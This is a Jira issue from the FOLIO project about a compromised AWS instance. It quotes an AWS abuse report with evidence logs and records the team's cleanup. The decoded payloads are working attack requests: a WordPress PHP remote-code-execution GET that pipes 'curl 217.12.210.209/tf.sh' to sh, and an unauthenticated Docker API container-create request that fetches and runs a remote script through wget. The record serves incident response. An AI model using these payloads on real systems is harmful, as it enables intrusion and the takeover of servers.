[FOLIO-2642] carrier-io-restored AWS security incident: wordpress_php_rce, docker_unauth_rce Created: 11/Jun/20 Updated: 17/Jun/20 Resolved: 17/Jun/20 |
|
| Status: | Closed |
| Project: | FOLIO |
| Components: | None |
| Affects versions: | None |
| Fix versions: | None |
| Type: | Task | Priority: | P1 |
| Reporter: | Peter Murray | Assignee: | John Malconian |
| Resolution: | Done | Votes: | 0 |
| Labels: | security | ||
| Remaining Estimate: | Not Specified | ||
| Time Spent: | Not Specified | ||
| Original estimate: | Not Specified | ||
| Sprint: | DevOps: sprint 90 |
| Development Team: | FOLIO DevOps |
| Description |
|
Hello, We've received a report(s) that your AWS resource(s) AWS ID: 732722833398 Region: us-east-1 EC2 Instance Id: i-0b5799b100760ae41 [3.93.19.104] has been implicated in activity which resembles attempts to access remote hosts on the internet without authorization. Activity of this nature is forbidden in the AWS Acceptable Use Policy (https://aws.amazon.com/aup/). We've included the original report below for your review. Please take action to stop the reported activity and reply directly to this email with details of the corrective actions you have taken. If you do not consider the activity described in these reports to be abusive, please reply to this email with details of your use case. If you're unaware of this activity, it's possible that your environment has been compromised by an external attacker, or a vulnerability is allowing your machine to be used in a way that it was not intended. We are unable to assist you with troubleshooting or technical inquiries. However, for guidance on securing your instance, we recommend reviewing the following resources:
If you require further assistance with this matter, you can take advantage of our developer forums: https://forums.aws.amazon.com/index.jspa Or, if you are subscribed to a Premium Support package, you may reach out for one-on-one assistance here: https://console.aws.amazon.com/support/home#/case/create?issueType=technical Please remember that you are responsible for ensuring that your instances and all applications are properly secured. If you require any further information to assist you in identifying or rectifying this issue, please let us know in a direct reply to this message. Regards, Case Number: 10688485529-1 Comments: You may find attached the logs from destinations which receieved the unexpected network traffic. Please note that the payload field in attached evidece logs is base64 encoded and the content must be handled with security precautions required to analyze potentially harmful malware.
{
"traffic_start": "2020-06-10 17:54:43 GMT",
"traffic_end": "2020-06-10 18:39:40 GMT",
"source_ip": "3.93.19.104",
"source_rdns": "ec2-3-93-19-104.compute-1.amazonaws.com",
"destination_ips": [
"15.185.200.0",
"13.208.183.251"
],
"destination_ports": [
"80/tcp",
"2375/tcp"
],
"payload_classes": [
"exploit:gen/docker_unauth_rce",
"exploit:gen/wordpress_php_rce"
],
"traffic_logs": [
{
"timestamp": 1591814380,
"source_ip": "3.93.19.104",
"source_domain": "ec2-3-93-19-104.compute-1.amazonaws.com",
"destination_ip": "15.185.200.0",
"destination_port": 80,
"destination_service": "http",
"protocol": "tcp",
"payload_class": "exploit:gen/wordpress_php_rce",
"payload_data": "R0VUIC8/YT1mZXRjaCZjb250ZW50PTxwaHA+ZGllKHNoZWxsX2V4ZWMoImN1cmwlMjAyMTcuMTIuMjEwLjIwOS90Zi5zaHxzaCIpKTwvcGhwPiBIVFRQLzEuMQ0KaG9zdDogMTUuMTg1LjIwMC4wOjgwDQp1c2VyLWFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOyBXaW42NDsgeDY0KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvNzguMC4zOTA0LjEwOCBTYWZhcmkvNTM3LjM2DQpjb25uZWN0aW9uOiBjbG9zZQ0KYWNjZXB0LWVuY29kaW5nOiBnemlwDQoNCg=="
},
{
"timestamp": 1591811683,
"source_ip": "3.93.19.104",
"source_domain": "ec2-3-93-19-104.compute-1.amazonaws.com",
"destination_ip": "13.208.183.251",
"destination_port": 2375,
"destination_service": "docker",
"protocol": "tcp",
"payload_class": "exploit:gen/docker_unauth_rce",
"payload_data": "UE9TVCAvdjEuMjQvY29udGFpbmVycy9jcmVhdGUgSFRUUC8xLjENCmhvc3Q6IDEzLjIwOC4xODMuMjUxOjIzNzUNCnVzZXItYWdlbnQ6IEdvLWh0dHAtY2xpZW50LzEuMQ0KY29udGVudC1sZW5ndGg6IDQ2MA0KY29udGVudC10eXBlOiBhcHBsaWNhdGlvbi9qc29uDQphY2NlcHQtZW5jb2Rpbmc6IGd6aXANCg0KeyJIb3N0bmFtZSI6IiIsIkRvbWFpbm5hbWUiOiIiLCJVc2VyIjoiIiwiQXR0YWNoU3RkaW4iOmZhbHNlLCJBdHRhY2hTdGRvdXQiOmZhbHNlLCJBdHRhY2hTdGRlcnIiOmZhbHNlLCJUdHkiOmZhbHNlLCJPcGVuU3RkaW4iOmZhbHNlLCJTdGRpbk9uY2UiOmZhbHNlLCJFbnYiOm51bGwsIkNtZCI6bnVsbCwiSW1hZ2UiOiJ1YnVudHUiLCJWb2x1bWVzIjpudWxsLCJXb3JraW5nRGlyIjoiIiwiRW50cnlwb2ludCI6WyIvYmluL2Jhc2giLCItYyIsImFwdC1nZXQgdXBkYXRlIFx1MDAyNlx1MDAyNiBhcHQtZ2V0IGluc3RhbGwgLXkgd2dldCBjcm9uO3NlcnZpY2UgY3JvbiBzdGFydDsgd2dldCAtcSAtTyAtIDIxNy4xMi4yMTAuMjA5L2Quc2ggfCBzaDt0YWlsIC1mIC9kZXYvbnVsbCJdLCJPbkJ1aWxkIjpudWxsLCJMYWJlbHMiOm51bGwsIkhvc3RDb25maWciOm51bGwsIk5ldHdvcmtpbmdDb25maWciOm51bGx9Cg=="
}
]
}
wordpress_php_rce payload after base 64 decoding:
GET /?a=fetch&content=<php>die(shell_exec("curl%20217.12.210.209/tf.sh|sh"))</php> HTTP/1.1
host: 15.185.200.0:80
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
connection: close
accept-encoding: gzip
docker_unauth_rce payload after base 64 decoding:
POST /v1.24/containers/create HTTP/1.1
host: 13.208.183.251:2375
user-agent: Go-http-client/1.1
content-length: 460
content-type: application/json
accept-encoding: gzip
{"Hostname":"","Domainname":"","User":"","AttachStdin":false,"AttachStdout":false,"AttachStderr":false,"Tty":false,"OpenStdin":false,"StdinOnce":false,"Env":null,"Cmd":null,"Image":"ubuntu","Volumes":null,"WorkingDir":"","Entrypoint":["/bin/bash","-c","apt-get update \u0026\u0026 apt-get install -y wget cron;service cron start; wget -q -O - 217.12.210.209/d.sh | sh;tail -f /dev/null"],"OnBuild":null,"Labels":null,"HostConfig":null,"NetworkingConfig":null}
|
| Comments |
| Comment by Peter Murray [ 16/Jun/20 ] |
|
John Malconian: Did you see the rather insistent follow-up email from AWS this morning? It seems like they want some kind of answer from us by email. Did you have a chance to clean up this server? |
| Comment by John Malconian [ 16/Jun/20 ] |
|
Peter Murray The server is still running but traffic is not allowed in and out. I have an outstanding request from Martin to take a backup of the influx dbs before I completely shut it down. Haven't seen the email from AWS yet, but I'll respond. |
| Comment by John Malconian [ 16/Jun/20 ] |
|
Sent response with our findings to AWS. |
| Comment by Peter Murray [ 16/Jun/20 ] |
|
Thanks! |
| Comment by John Malconian [ 16/Jun/20 ] |
|
I've taken influx db backups according to instructions from Martin and provided them to him via S3. The 'carrier-io-restored' has been terminated. I'm going to close this issue and follow up separately about a rebuild. |